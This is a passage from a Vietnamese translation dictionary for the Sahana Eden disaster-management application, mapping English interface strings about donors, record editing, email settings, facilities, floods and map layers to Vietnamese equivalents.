bị sơ tán', 'Display Chart': 'Hiển thị biểu đồ', 'Display Polygons?': 'Hiển thị hình đa giác?', 'Display Question on Map': 'Hiển thị câu hỏi trên bản đồ', 'Display Routes?': 'Hiển thị tuyến đường?', 'Display Selected Questions': 'Hiển thị câu hỏi được lựa chọn', 'Display Tracks?': 'Hiển thị dấu vết?', 'Display Waypoints?': 'Hiển thị các cột báo trên đường?', 'Display': 'Hiển thị', 'Distance from %s:': 'Khoảng cách từ %s:', 'Distribution Item Details': 'Chi tiết hàng hóa cấp phát', 'Distribution Item': 'Hàng hóa cấp phát', 'Distribution groups': 'Nhóm cấp phát', 'Distribution of Food': 'Cấp phát lương thực', 'Distribution of Non-Food Items': 'Cấp phát các mặt hàng phi lương thực', 'Distribution of Shelter Repair Kits': 'Cấp phát bộ dụng cụ sửa nhà', 'Distribution': 'Cấp phát', 'District': 'Quận/ Huyện', 'Diversifying Livelihoods': 'Đa dạng nguồn sinh kế', 'Divorced': 'Ly hôn', 'Do you really want to approve this record?': 'Bạn có thực sự muốn chấp thuân hồ sơ này không?', 'Do you really want to delete these records?': 'Bạn có thực sự muốn xóa các hồ sơ này không?', 'Do you really want to delete this record? (This action can not be reversed)': 'Bạn có thực sự muốn xóa hồ sơ này không? (Hồ sơ không thể khôi phục lại sau khi xóa)', 'Do you want to cancel this received shipment? The items will be removed from the Warehouse. This action CANNOT be undone!': 'Bạn có muốn hủy lô hàng đã nhận được này không? Hàng hóa này sẽ bị xóa khỏi Kho hàng. Dữ liệu không thể khôi phục lại sau khi xóa!', 'Do you want to cancel this sent shipment? The items will be returned to the Warehouse. 
This action CANNOT be undone!': 'Bạn có muốn hủy lô hàng đã gửi này không? Hàng hóa này sẽ được trả lại Kho hàng. Dữ liệu không thể khôi phục lại sau khi xóa!', 'Do you want to close this adjustment?': 'Bạn có muốn đóng điều chỉnh này lại?', 'Do you want to complete the return process?': 'Bạn có muốn hoàn thành quá trình trả lại hàng này?', 'Do you want to over-write the file metadata with new default values?': 'Bạn có muốn thay dữ liệu file bằng giá trị mặc định mới không?', 'Do you want to receive this shipment?': 'Bạn có muốn nhận lô hàng này?', 'Do you want to send this shipment?': 'Bạn có muốn gửi lô hàng này?', 'Document Details': 'Chi tiết tài liệu', 'Document Scan': 'Quét Tài liệu', 'Document added': 'Tài liệu đã được thêm', 'Document deleted': 'Tài liệu đã được xóa', 'Document updated': 'Tài liệu đã được cập nhật', 'Document': 'Tài liệu', 'Documents': 'Tài liệu', 'Doing nothing (no structured activity)': 'Không làm gì (không có hoạt động theo kế hoạch)', 'Domain': 'Phạm vi hoạt động', 'Domestic chores': 'Công việc nội trợ', 'Donated': 'Đã tài trợ', 'Donating Organization': 'Tổ chức tài trợ', 'Donation Phone #': 'Số điện thoại để ủng hộ', 'Donation': 'Ủng hộ', 'Donor Details': 'Thông tin nhà tài trợ', 'Donor Driven Housing Reconstruction': 'Xây lại nhà theo yêu cầu của nhà tài trợ', 'Donor added': 'Nhà tài trợ đã được thêm', 'Donor deleted': 'Nhà tài trợ đã được xóa', 'Donor updated': 'Nhà tài trợ đã được cập nhật', 'Donor': 'Nhà Tài trợ', 'Donors': 'Nhà tài trợ', 'Donor(s)': 'Nhà tài trợ', 'Donors Report': 'Báo cáo nhà tài trợ', 'Download Assessment Form Document': 'Tải về biểu mẫu đánh giá dạng văn bản', 'Download Assessment Form Spreadsheet': 'Tải về biểu mẫu đánh giá dạng excel', 'Download OCR-able PDF Form': 'Tải về biểu mẫu định dạng OCR-able PDF', 'Download Template': 'Tải Mẫu nhập liệu', 'Download last build': 'Tải về bộ tài liệu cập nhật nhất', 'Download': 'Tải về', 'Download.CSV formatted Template': 'Tải về biểu mẫu định dạng CSV', 'Draft Features': 'Chức năng dự thảo', 'Draft': 'Dự thảo', 'Drainage': 'Hệ thống thoát nước', 'Draw a square to limit the results to just those within the square.': 'Vẽ một ô vuông để giới hạn kết quả tìm kiếm chỉ nằm trong ô vuông đó', 'Driving License': 'Giấy phép lái xe', 'Drought': 'Hạn hán', 'Drugs': 'Thuốc', 'Due %(date)s': 'Hết hạn %(date)s', 'Dug Well': 'Đào giếng', 'Dump': 'Trút xuống', 'Duplicate Locations': 'Các địa điểm trùng lặp', 'Duplicate label selected': 'Đã chọn nhãn trùng lặp', 'Duplicate': 'Nhân đôi', 'Duration (months)': 'Khoảng thời gian (tháng)', 'Dust Storm': 'Bão cát', 'EMS Status': 'Tình trạng EMS', 'Early Warning': 'Cảnh báo sớm', 'Earthquake': 'Động đất', 'Economics of DRR': 'Tính kinh tế của GTRRTH', 'Edit Activity Type': 'Chỉnh sửa loại hình hoạt động', 'Edit Activity': 'Chỉnh sửa hoạt động', 'Edit Address': 'Chỉnh sửa địa chỉ', 'Edit Adjustment': 'Chỉnh sửa điều chỉnh', 'Edit Affiliation': 'Chỉnh sửa liên kết', 'Edit Aid Request': 'Chỉnh sửa Yêu cầu cứu trợ', 'Edit Alternative Item': 'Chỉnh sửa mặt hàng thay thế', 'Edit Annual Budget': 'Chỉnh sửa ngân sách năm', 'Edit Assessment Answer': 'Chỉnh sửa câu trả lời trong mẫu đánh giá', 'Edit Assessment Question': 'Chỉnh sửa câu hỏi trong mẫu đánh giá', 'Edit Assessment Template': 'Chỉnh sửa biểu mẫu đánh giá', 'Edit Assessment': 'Chỉnh sửa Đánh giá', 'Edit Asset Log Entry': 'Chỉnh sửa ghi chép nhật ký tài sản', 'Edit Asset': 'Chỉnh sửa tài sản', 'Edit Beneficiaries': 'Chỉnh sửa người hưởng lợi', 'Edit Beneficiary Type': 'Chỉnh sửa loại người 
hưởng lợi', 'Edit Branch Organization': 'Chỉnh sửa tổ chức cơ sở', 'Edit Brand': 'Chỉnh sửa nhãn hiệu', 'Edit Catalog Item': 'Chỉnh sửa mặt hàng trong danh mục', 'Edit Catalog': 'Chỉnh sửa danh mục hàng hóa', 'Edit Certificate': 'Chỉnh sửa chứng chỉ', 'Edit Certification': 'Chỉnh sửa bằng cấp', 'Edit Cluster': 'Chỉnh sửa nhóm', 'Edit Commitment Item': 'Chỉnh sửa mặt hàng cam kết', 'Edit Commitment': 'Chỉnh sửa cam kết', 'Edit Committed Person': 'Chỉnh sửa đối tượng cam kết', 'Edit Community Details': 'Chỉnh sửa thông tin về cộng đồng', 'Edit Competency Rating': 'Chỉnh sửa xếp hạng năng lực', 'Edit Completed Assessment Form': 'Chỉnh sửa biểu mẫu đánh giá đã hoàn thiện', 'Edit Contact Details': 'Chỉnh sửa thông tin liên hệ', 'Edit Contact Information': 'Chỉnh sửa thông tin liên hệ', 'Edit Course Certificate': 'Chỉnh sửa chứng chỉ khóa học', 'Edit Course': 'Chỉnh sửa khóa học', 'Edit Credential': 'Chỉnh sửa thư ủy nhiệm', 'Edit DRRPP Extensions': 'Chỉnh sửa phần mở rộng DRRPP', 'Edit Defaults': 'Chỉnh sửa mặc định', 'Edit Demographic Data': 'Chỉnh sửa số liệu dân số', 'Edit Demographic Source': 'Chỉnh sửa nguồn số liệu dân số', 'Edit Demographic': 'Chỉnh sửa dữ liệu nhân khẩu', 'Edit Department': 'Chỉnh sửa phòng/ban', 'Edit Description': 'Chỉnh sửa mô tả', 'Edit Details': 'Chỉnh sửa thông tin chi tiết', 'Edit Disaster Victims': 'Chỉnh sửa thông tin nạn nhân trong thiên tai', 'Edit Distribution': 'Chỉnh sửa cấp phát', 'Edit Document': 'Chỉnh sửa tài liệu', 'Edit Donor': 'Chỉnh sửa nhà tài trợ', 'Edit Education Details': 'Chỉnh sửa thông tin về trình độ học vấn', 'Edit Email Settings': 'Chỉnh sửa cài đặt email', 'Edit Entry': 'Chỉnh sửa hồ sơ', 'Edit Facility Type': 'Chỉnh sửa loại hình bộ phận', 'Edit Facility': 'Chỉnh sửa bộ phận', 'Edit Feature Layer': 'Chỉnh sửa lớp chức năng', 'Edit Framework': 'Chỉnh sửa khung chương trình', 'Edit Group': 'Chỉnh sửa nhóm', 'Edit Hazard': 'Chỉnh sửa hiểm họa', 'Edit Hospital': 'Chỉnh sửa Bệnh viện', 'Edit Hours': 'Chỉnh sửa thời gian hoạt động', 'Edit Human Resource': 'Chỉnh sửa nguồn nhân lực', 'Edit Identification Report': 'Chỉnh sửa báo cáo nhận dạng', 'Edit Identity': 'Chỉnh sửa nhận dạng', 'Edit Image Details': 'Chỉnh sửa thông tin hình ảnh', 'Edit Image': 'Chỉnh sửa ảnh', 'Edit Incident Report': 'Chỉnh sửa báo cáo sự cố', 'Edit Incident': 'Chỉnh sửa sự cố', 'Edit Item Catalog Categories': 'Chỉnh sửa danh mục hàng hóa', 'Edit Item Category': 'Chỉnh sửa danh mục hàng hóa', 'Edit Item Pack': 'Chỉnh sửa gói hàng', 'Edit Item in Request': 'Chỉnh sửa mặt hàng đang được yêu cầu', 'Edit Item': 'Chỉnh sửa mặt hàng', 'Edit Job Role': 'Chỉnh sửa vai trò công việc', 'Edit Job Title': 'Chỉnh sửa chức danh', 'Edit Job': 'Chỉnh sửa công việc', 'Edit Key': 'Chỉnh sửa Key', 'Edit Layer': 'Chỉnh sửa lớp', 'Edit Level %d Locations?': 'Chỉnh sửa cấp độ %d địa điểm?', 'Edit Location Details': 'Chỉnh sửa chi tiết địa điểm', 'Edit Location Hierarchy': 'Chỉnh sửa thứ tự địa điểm', 'Edit Location': 'Chỉnh sửa địa điểm', 'Edit Log Entry': 'Chỉnh sửa ghi chép nhật ký', 'Edit Logged Time': 'Chỉnh sửa thời gian đăng nhập', 'Edit Mailing List': 'Chỉnh sửa danh sách gửi thư', 'Edit Map Profile': 'Chỉnh sửa cài đặt cấu hình bản đồ', 'Edit Map Services': 'Chỉnh sửa dịch vụ bản đồ', 'Edit Marker': 'Chỉnh sửa công cụ đánh dấu', 'Edit Member': 'Chỉnh sửa hội viên', 'Edit Membership Type': 'Chỉnh sửa loại hình nhóm hội viên', 'Edit Membership': 'Chỉnh sửa nhóm hội viên', 'Edit Message': 'Chỉnh sửa tin nhắn', 'Edit Messaging Settings': 'Chỉnh sửa thiết lập tin nhắn', 'Edit 
Metadata': 'Chỉnh sửa siêu dữ liệu', 'Edit Milestone': 'Chỉnh sửa mốc thời gian quan trọng', 'Edit Modem Settings': 'Chỉnh sửa cài đặt Modem', 'Edit National Society': 'Chỉnh sửa Hội Quốc gia', 'Edit Office Type': 'Chỉnh sửa loại hình văn phòng', 'Edit Office': 'Chỉnh sửa văn phòng', 'Edit Options': 'Chỉnh sửa lựa chọn', 'Edit Order': 'Chỉnh sửa đơn đặt hàng', 'Edit Organization Domain': 'Chỉnh sửa lĩnh vực hoạt động của tổ chức', 'Edit Organization Type': 'Chỉnh sửa loại hình tổ chức', 'Edit Organization': 'Chỉnh sửa tổ chức', 'Edit Output': 'Chỉnh sửa kết quả đầu ra', 'Edit Parser Settings': 'Chỉnh sửa cài đặt cú pháp', 'Edit Participant': 'Chỉnh sửa người tham dự', 'Edit Partner Organization': 'Chỉnh sửa tổ chức đối tác', 'Edit Peer Details': 'Chỉnh sửa chi tiết nhóm người', 'Edit Permissions for %(role)s': 'Chỉnh sửa quyền truy cập cho %(role)s', 'Edit Person Details': 'Chỉnh sửa thông tin cá nhân', 'Edit Photo': 'Chỉnh sửa ảnh', 'Edit Problem': 'Chỉnh sửa Vấn đề', 'Edit Professional Experience': 'Chỉnh sửa kinh nghiệm nghề nghiệp', 'Edit Profile Configuration': 'Chỉnh sửa định dạng hồ sơ tiểu sử', 'Edit Program': 'Chỉnh sửa chương trình', 'Edit Project Organization': 'Chỉnh sửa tổ chức thực hiện dự án', 'Edit Project': 'Chỉnh sửa dự án', 'Edit Projection': 'Chỉnh sửa phép chiếu', 'Edit Question Meta-Data': 'Chỉnh sửa siêu dữ liệu câu hỏi', 'Edit Record': 'Chỉnh sửa hồ sơ', 'Edit Recovery Details': 'Chỉnh sửa chi tiết khôi phục', 'Edit Report': 'Chỉnh sửa báo cáo', 'Edit Repository Configuration': 'Chỉnh sửa định dạng lưu trữ', 'Edit Request Item': 'Chỉnh sửa yêu cầu hàng hóa', 'Edit Request': 'Chỉnh sửa yêu cầu', 'Edit Requested Skill': 'Chỉnh sửa kỹ năng được yêu cầu', 'Edit Resource Configuration': 'Chỉnh sửa định dạng nguồn', 'Edit Resource': 'Chỉnh sửa tài nguyên', 'Edit Response': 'Chỉnh sửa phản hồi', 'Edit Role': 'Chỉnh sửa vai trò', 'Edit Room': 'Chỉnh sửa phòng', 'Edit SMS Message': 'Chỉnh sửa tin nhắn SMS', 'Edit SMS Settings': 'Chỉnh sửa cài đặt tin nhắn SMS', 'Edit SMTP to SMS Settings': 'Chỉnh sửa SMTP sang cài đặt SMS', 'Edit Sector': 'Chỉnh sửa lĩnh vực', 'Edit Setting': 'Chỉnh sửa cài đặt', 'Edit Settings': 'Thay đổi thiết lập', 'Edit Shelter Service': 'Chỉnh sửa dịch vụ cư trú', 'Edit Shelter': 'Chỉnh sửa thông tin cư trú', 'Edit Shipment Item': 'Chỉnh sửa hàng hóa trong lô hàng vận chuyển', 'Edit Site': 'Chỉnh sửa thông tin trên website', 'Edit Skill Equivalence': 'Chỉnh sửa kỹ năng tương đương', 'Edit Skill Type': 'Chỉnh sửa loại kỹ năng', 'Edit Skill': 'Chỉnh sửa kỹ năng', 'Edit Staff Assignment': 'Chỉnh sửa phân công cán bộ', 'Edit Staff Member Details': 'Chỉnh sửa thông tin chi tiết của cán bộ', 'Edit Status': 'Chỉnh sửa tình trạng', 'Edit Supplier': 'Chỉnh sửa nhà cung cấp', 'Edit Survey Answer': 'Chỉnh sửa trả lời khảo sát', 'Edit Survey Series': 'Chỉnh sửa chuỗi khảo sát', 'Edit Survey Template': 'Chỉnh sửa mẫu điều tra', 'Edit Symbology': 'Chỉnh sửa biểu tượng', 'Edit Synchronization Settings': 'Chỉnh sửa cài đặt đồng bộ hóa', 'Edit Task': 'Chỉnh sửa nhiệm vụ', 'Edit Team': 'Chỉnh sửa Đội/Nhóm', 'Edit Template Section': 'Chỉnh sửa nội dung trong biểu mẫu', 'Edit Theme Data': 'Chỉnh sửa dữ liệu chủ đề', 'Edit Theme': 'Chỉnh sửa chủ đề', 'Edit Training Event': 'Chỉnh sửa sự kiện tập huấn', 'Edit Training': 'Chỉnh sửa tập huấn', 'Edit Tropo Settings': 'Chỉnh sửa cài đặt Tropo', 'Edit Twilio Settings': 'Chỉnh sửa cài đặt Twilio', 'Edit User': 'Chỉnh sửa người sử dụng', 'Edit Vehicle Assignment': 'Chỉnh sửa phân công phương tiện vận chuyển', 'Edit Volunteer Cluster Position': 
'Chỉnh sửa vị trí nhóm tình nguyện viên', 'Edit Volunteer Cluster Type': 'Chỉnh sửa loại hình nhóm tình nguyện viên', 'Edit Volunteer Cluster': 'Chỉnh sửa nhóm tình nguyện viên', 'Edit Volunteer Details': 'Chỉnh sửa thông tin tình nguyện viên', 'Edit Volunteer Registration': 'Chỉnh sửa đăng ký tình nguyện viên', 'Edit Volunteer Role': 'Chỉnh sửa vai trò tình nguyện viên', 'Edit Vulnerability Aggregated Indicator': 'Chỉnh sửa chỉ số gộp đánh giá tình trạng dễ bị tổn thương', 'Edit Vulnerability Data': 'Chỉnh sửa dữ liệu về tình trạng dễ bị tổn thương', 'Edit Vulnerability Indicator Sources': 'Chỉnh sửa nguồn chỉ số đánh giá tình trạng dễ bị tổn thương', 'Edit Vulnerability Indicator': 'Chỉnh sửa chỉ số đánh giá tình trạng dễ bị tổn thương', 'Edit Warehouse Stock': 'Chỉnh sửa hàng lưu kho', 'Edit Warehouse': 'Chỉnh sửa kho hàng', 'Edit Web API Settings': 'Chỉnh sửa Cài đặt Web API', 'Edit current record': 'Chỉnh sửa hồ sơ hiện tại', 'Edit message': 'Chỉnh sửa tin nhắn', 'Edit saved search': 'Chỉnh sửa tìm kiếm đã lưu', 'Edit the Application': 'Chỉnh sửa ứng dụng', 'Edit the OpenStreetMap data for this area': 'Chỉnh sửa dữ liệu bản đồ OpenStreetMap cho vùng này', 'Edit this Disaster Assessment': 'Chỉnh sửa báo cáo đánh giá thảm họa này', 'Edit this entry': 'Chỉnh sửa hồ sơ này', 'Edit': 'Chỉnh sửa', 'Editable?': 'Có thể chỉnh sửa?', 'Education & Advocacy': 'Giáo dục và Vận động chính sách', 'Education & School Safety': 'Giáo dục và An toàn trong trường học', 'Education Details': 'Thông tin về trình độ học vấn', 'Education details added': 'Thông tin về trình độ học vấn đã được thêm', 'Education details deleted': 'Thông tin về trình độ học vấn đã được xóa', 'Education details updated': 'Thông tin về trình độ học vấn đã được cập nhật', 'Education materials received': 'Đã nhận được tài liệu, dụng cụ phục vụ học tập', 'Education materials, source': 'Dụng cụ học tập, nguồn', 'Education': 'Trình độ học vấn', 'Either a shelter or a location must be specified': 'Phải nêu rõ nhà tạm hoặc vị trí', 'Either file upload or document URL required.': 'Cần tải lên file hoặc cung cấp đường dẫn URL của tài liệu.', 'Either file upload or image URL required.': 'Cần tải lên file hoặc cung cấp đường dẫn URL của hình ảnh.', 'Elevated': 'Nâng cao lên', 'Email Address to which to send SMS messages. Assumes sending to phonenumber@address': 'Địa chỉ email để gửi tin nhắn SMS. 
Giả định gửi đến dạng số-điện-thoại@địa-chỉ', 'Email Address': 'Địa chỉ email', 'Email Details': 'Thông tin về địa chỉ email', 'Email InBox': 'Hộp thư đến trong email', 'Email Setting Details': 'Thông tin cài đặt email', 'Email Setting deleted': 'Cài đặt email đã được xóa', 'Email Settings': 'Cài đặt email', 'Email address verified, however registration is still pending approval - please wait until confirmation received.': 'Địa chỉ email đã được xác nhận, tuy nhiên đăng ký vẫn còn chờ duyệt - hãy đợi đến khi nhận được phê chuẩn', 'Email deleted': 'Email đã được xóa', 'Email settings updated': 'Cài đặt email đã được cập nhật', 'Emergency Contact': 'Thông tin liên hệ trong trường hợp khẩn cấp', 'Emergency Contacts': 'Thông tin liên hệ trong trường hợp khẩn cấp', 'Emergency Department': 'Bộ phận cấp cứu', 'Emergency Health': 'Chăm sóc sức khỏe trong tình huống khẩn cấp', 'Emergency Medical Technician': 'Nhân viên y tế EMT', 'Emergency Shelter': 'Nhà tạm trong tình huống khẩn cấp', 'Emergency Support Facility': 'Bộ phận hỗ trợ khẩn cấp', 'Emergency Support Service': 'Dịch vụ hỗ trợ khẩn cấp', 'Emergency Telecommunication': 'Truyền thông trong tình huống khẩn cấp', 'Emergency Telecommunications': 'Thông tin liên lạc trong tình huống khẩn cấp', 'Emergency contacts': 'Thông tin liên hệ khẩn cấp', 'Employment type': 'Loại hình lao động', 'Enable in Default Config?': 'Cho phép ở cấu hình mặc định?', 'Enable': 'Cho phép', 'Enable/Disable Layers': 'Kích hoạt/Tắt lớp', 'Enabled': 'Được cho phép', 'End Date': 'Ngày kết thúc', 'End date': 'Ngày kết thúc', 'Enter Completed Assessment Form': 'Nhập biểu mẫu đánh giá đã hoàn thiện', 'Enter Completed Assessment': 'Nhập báo cáo đánh giá đã hoàn thiện', 'Enter Coordinates in Deg Min Sec': 'Nhập tọa độ ở dạng Độ,Phút,Giây', 'Enter a name for the spreadsheet you are uploading (mandatory).': 'Nhập tên cho bảng tính bạn đang tải lên (bắt buộc)', 'Enter a new support request.': 'Nhập một yêu cầu hỗ trợ mới', 'Enter a summary of the request here.': 'Nhập tóm tắt các yêu cầu ở đây', 'Enter a valid email': 'Nhập địa chỉ email có giá trị', 'Enter a value carefully without spelling mistakes, this field will be crosschecked.': 'Nhập giá trị cẩn thận tránh các lỗi chính tả, nội dung này sẽ được kiểm tra chéo', 'Enter indicator ratings': 'Nhập xếp hạng chỉ số', 'Enter keywords': 'Từ khóa tìm kiếm', 'Enter some characters to bring up a list of possible matches': 'Nhập một vài ký tự để hiện ra danh sách có sẵn', 'Enter the same password as above': 'Nhập lại mật khẩu giống như trên', 'Enter your first name': 'Nhập tên của bạn', 'Enter your organization': 'Nhập tên tổ chức của bạn', 'Entering a phone number is optional, but doing so allows you to subscribe to receive SMS messages.': 'Nhập số điện thoại là không bắt buộc, tuy nhiên nếu nhập số điện thoại bạn sẽ có thể nhận được các tin nhắn', 'Entity': 'Pháp nhân', 'Entry added to Asset Log': 'Ghi chép đã được thêm vào nhật ký tài sản', 'Environment': 'Môi trường', 'Epidemic': 'Dịch bệnh', 'Epidemic/Pandemic Preparedness': 'Phòng dịch', 'Error File missing': 'Lỗi không tìm thấy file', 'Error in message': 'Lỗi trong tin nhắn', "Error logs for '%(app)s'": "Báo cáo lỗi cho '%(app)s'", 'Errors': 'Lỗi', 'Essential Staff?': 'Cán bộ Chủ chốt?', 'Estimated # of households who are affected by the emergency': 'Ước tính # số hộ chịu ảnh hưởng từ thiên tai', 'Estimated Delivery Date': 'Thời gian giao hàng dự kiến', 'Estimated Value per Pack': 'Giá trị dự tính mỗi gói', 'Ethnicity': 'Dân tộc', 'Euros': 'Đồng Euro', 'Evaluate the information in this 
message. (This value SHOULD NOT be used in public warning applications.)': 'Đánh giá thông tin trong thư. (giá trị này KHÔNG NÊN sử dụng trong các ứng dụng cảnh báo công cộng)', 'Event Type': 'Loại Sự kiện', 'Event type': 'Loại sự kiện', 'Events': 'Sự kiện', 'Example': 'Ví dụ', 'Excellent': 'Tuyệt vời', 'Excreta Disposal': 'Xử lý phân', 'Expected Out': 'Theo dự kiến', 'Experience': 'Kinh nghiệm', 'Expiration Date': 'Ngày hết hạn', 'Expiration Details': 'Thông tin về hết hạn', 'Expiration Report': 'Báo cáo hết hạn', 'Expired': 'Đã hết hạn', 'Expiring Staff Contracts Report': 'Báo cáo hợp đồng lao động sắp hết hạn', 'Expiry (months)': 'Hết hạn (tháng)', 'Expiry Date': 'Ngày hết hạn', 'Expiry Date/Time': 'Ngày/Giờ hết hạn', 'Expiry Time': 'Hạn sử dụng', 'Explanation about this view': 'Giải thích về chế độ xem này', 'Explosive Hazard': 'Hiểm họa cháy nổ', 'Export Data': 'Xuất dữ liệu', 'Export all Completed Assessment Data': 'Chiết xuất toàn bộ dữ liệu đánh giá đã hoàn thiện', 'Export as Pootle (.po) file (Excel (.xls) is default)': 'Chiết xuất định dạng file Pootle (.po) (định dạng excel là mặc định)', 'Export as': 'Chiết xuất dưới dạng', 'Export in EDXL-HAVE format': 'Chiết xuất ra định dạng EDXL-HAVE', 'Export in GPX format': 'Chiết xuất định dạng file GPX', 'Export in HAVE format': 'Chiết xuất định dạng HAVE', 'Export in KML format': 'Chiết xuất định dạng KML', 'Export in OSM format': 'Chiết xuất định dạng OSM', 'Export in PDF format': 'Chiết xuất định dạng PDF', 'Export in RSS format': 'Chiết xuất định dạng RSS', 'Export in XLS format': 'Chiết xuất định dạng XLS', 'Export to': 'Chiết xuất tới', 'Eye Color': 'Màu mắt', 'FAIR': 'TRUNG BÌNH', 'FROM': 'TỪ', 'Facial hair, color': 'Màu râu', 'Facial hair, length': 'Độ dài râu', 'Facial hair, type': 'Kiểu râu', 'Facilities': 'Bộ phận', 'Facility Contact': 'Thông tin liên hệ của bộ phận', 'Facility Details': 'Thông tin về bộ phận', 'Facility Type Details': 'Thông tin về loại hình bộ phận', 'Facility Type added': 'Loại hình bộ phận đã được thêm', 'Facility Type deleted': 'Loại hình bộ phận đã được xóa', 'Facility Type updated': 'Loại hình bộ phận đã được cập nhật', 'Facility Types': 'Loại hình bộ phận', 'Facility added': 'Bộ phận đã được thêm', 'Facility deleted': 'Bộ phận đã được xóa', 'Facility updated': 'Bộ phận đã được cập nhật', 'Facility': 'Bộ phận', 'Fail': 'Thất bại', 'Failed to approve': 'Không phê duyệt thành công', 'Fair': 'Trung bình', 'Falling Object Hazard': 'Hiểm họa vật thể rơi từ trên cao', 'Family': 'Gia đình', 'Family/friends': 'Gia đình/Bạn bè', 'Feature Info': 'Thông tin chức năng', 'Feature Layer Details': 'Thông tin về lớp chức năng', 'Feature Layer added': 'Lớp chức năng đã được thêm', 'Feature Layer deleted': 'Lớp chức năng đã được xóa', 'Feature Layer updated': 'Lớp chức năng đã được cập nhật', 'Feature Layer': 'Lớp Chức năng', 'Feature Layers': 'Lớp Chức năng', 'Feature Namespace': 'Vùng tên chức năng', 'Feature Request': 'Yêu cầu chức năng', 'Feature Type': 'Loại chức năng', 'Features Include': 'Chức năng bao gồm', 'Feedback': 'Phản hồi', 'Female headed households': 'Hộ gia đình do phụ nữ làm chủ hộ', 'Female': 'Nữ', 'Few': 'Một vài', 'File Uploaded': 'File đã được tải lên', 'File uploaded': 'File đã được tải lên', 'Fill out online below or ': 'Điền thông tin trực tuyến vào phía dưới hoặc', 'Filter Field': 'Ô lọc thông tin', 'Filter Options': 'Lựa chọn lọc', 'Filter Value': 'Giá trị lọc', 'Filter by Category': 'Lọc theo danh mục', 'Filter by Country': 'Lọc theo quốc gia', 'Filter by Organization': 'Lọc theo tổ chức', 'Filter by 
Status': 'Lọc theo tình trạng', 'Filter type ': 'Hình thức lọc', 'Filter': 'Bộ lọc', 'Financial System Development': 'Xây dựng hệ thống tài chính', 'Find Recovery Report': 'Tìm Báo cáo phục hồi', 'Find by Name': 'Tìm theo tên', 'Find': 'Tìm', 'Fingerprint': 'Vân tay', 'Fingerprinting': 'Dấu vân tay', 'Fire Station': 'Trạm chữa cháy', 'Fire Stations': 'Trạm chữa cháy', 'Fire': 'Hỏa hoạn', 'First Name': 'Tên', 'First': 'Trang đầu', 'Flash Flood': 'Lũ Quét', 'Flash Freeze': 'Lạnh cóng đột ngột', 'Flood Alerts': 'Báo động lũ', 'Flood Report Details': 'Chi tiết báo cáo tình hình lũ lụt', 'Flood Report added': 'Báo cáo lũ lụt đã được thêm', 'Flood Report updated': 'Đã cập nhật báo cáo tình hình lũ lụt ', 'Flood': 'Lũ lụt', 'Focal Point': 'Đầu mối liên hệ', 'Fog': 'Sương mù', 'Food Security': 'An ninh lương thực', 'Food': 'Thực phẩm', 'For Entity': 'Đối với đơn vị', 'For POP-3 this is usually 110 (995 for SSL), for IMAP this is usually 143 (993 for IMAP).': 'Đối với POP-3 thường sử dụng 110 (995 cho SSL), đối với IMAP thường sử dụng 143 (993 cho IMAP).', 'For each sync partner, there is a default sync job that runs after a specified interval of time. You can also set up more sync jobs which could be customized on your needs. Click the link on the right to get started.': 'Đối với mỗi đối tác đồng bộ, có một công việc đồng bộ mặc định chạy sau một khoảng thời gian nhất định. Bạn cũng có thể thiết lập thêm công việc đồng bộ hơn nữa để có thể tùy biến theo nhu cầu. Nhấp vào liên kết bên phải để bắt đầu', 'For live help from the Sahana community on using this application, go to': 'Để được giúp đỡ trực tuyến từ cộng đồng Sahana về sử dụng phần mềm ứng dụng, mời đến', 'For more details on the Sahana Eden system, see the': 'Chi tiết hệ thống Sahana Eden xem tại', 'Forest Fire': 'Cháy rừng', 'Form Settings': 'Cài đặt biểu mẫu', 'Formal camp': 'Trại chính thức', 'Format': 'Định dạng', 'Found': 'Tìm thấy', 'Framework added': 'Khung chương trình đã được thêm', 'Framework deleted': 'Khung chương trình đã được xóa', 'Framework updated': 'Khung chương trình đã được cập nhật', 'Framework': 'Khung chương trình', 'Frameworks': 'Khung chương trình', 'Freezing Drizzle': 'Mưa bụi lạnh cóng', 'Freezing Rain': 'Mưa lạnh cóng', 'Freezing Spray': 'Mưa phùn lạnh cóng', 'Frequency': 'Tần suất', 'From Facility': 'Từ bộ phận', 'From Warehouse/Facility/Office': 'Từ Kho hàng/Bộ phận/Văn phòng', 'From': 'Từ', 'Frost': 'Băng giá', 'Fulfil. 
Status': 'Tình trạng đáp ứng', 'Full beard': 'Râu rậm', 'Full-time': 'Chuyên trách', 'Fullscreen Map': 'Bản đồ toàn màn hình', 'Function Permissions': 'Chức năng cho phép', 'Function for Value': 'Chức năng cho giá trị', 'Function': 'Chức năng', 'Functions available': 'Chức năng sẵn có', 'Funding Report': 'Báo cáo tài trợ', 'Funding': 'Kinh phí', 'Fundraising, income generation, in-kind support, partnership': 'Gây quỹ, tạo thu nhập, hỗ trợ bằng hiện vật, hợp tác', 'Funds Contributed by this Organization': 'Tài trợ đóng góp bởi tổ chức này', 'Funds Contributed': 'Kinh phí được tài trợ', 'GIS & Mapping': 'GIS & Lập bản đồ', 'GO TO ANALYSIS': 'ĐẾN MỤC PHÂN TÍCH', 'GO TO THE REGION': 'ĐẾN KHU VỰC', 'GPS Data': 'Dữ liệu GPS', 'GPS Marker': 'Dụng cụ đánh dấu GPS', 'GPS Track File': 'File vẽ GPS', 'GPS Track': 'Đường vẽ GPS', 'GPX Layer': 'Lớp GPX', 'Gale Wind': 'Gió mạnh', 'Gap Analysis Map': 'Bản đồ phân tích thiếu hụt', 'Gap Analysis Report': 'Báo cáo phân tích thiếu hụt', 'Gauges': 'Máy đo', 'Gender': 'Giới', 'Generate portable application': 'Tạo ứng dụng cầm tay', 'Generator': 'Máy phát điện', 'GeoJSON Layer': 'Lớp GeoJSON', 'GeoRSS Layer': 'Lớp GeoRSS', 'Geocoder Selection': 'Lựa chọn các mã địa lý', 'Geometry Name': 'Tên cấu trúc hình học', 'Get Feature Info': 'Lấy thông tin về chức năng', 'Give a brief description of the image, e.g. what can be seen where on the picture (optional).': 'Đưa ra chú thích hình ảnh ngắn gọn, vd: có thể xem gì ở đâu trên bức hình này (không bắt buộc).', 'Global Messaging Settings': 'Cài đặt hộp thư tin nhắn toàn cầu', 'Go to Functional Map': 'Tới bản đồ chức năng', 'Go to Request': 'Đến mục yêu cầu', 'Go to the': 'Đến', 'Go': 'Thực hiện', 'Goatee': 'Chòm râu dê', 'Good Condition': 'Điều kiện tốt', 'Good': 'Tốt', 'Goods Received Note': 'Giấy nhận Hàng hóa', 'Google Layer': 'Lớp Google', 'Governance': 'Quản lý nhà nước', 'Grade Code': 'Bậc lương', 'Grade': 'Tốt nghiệp hạng', 'Graduate': 'Đại học', 'Graph': 'Đồ thị', 'Great British 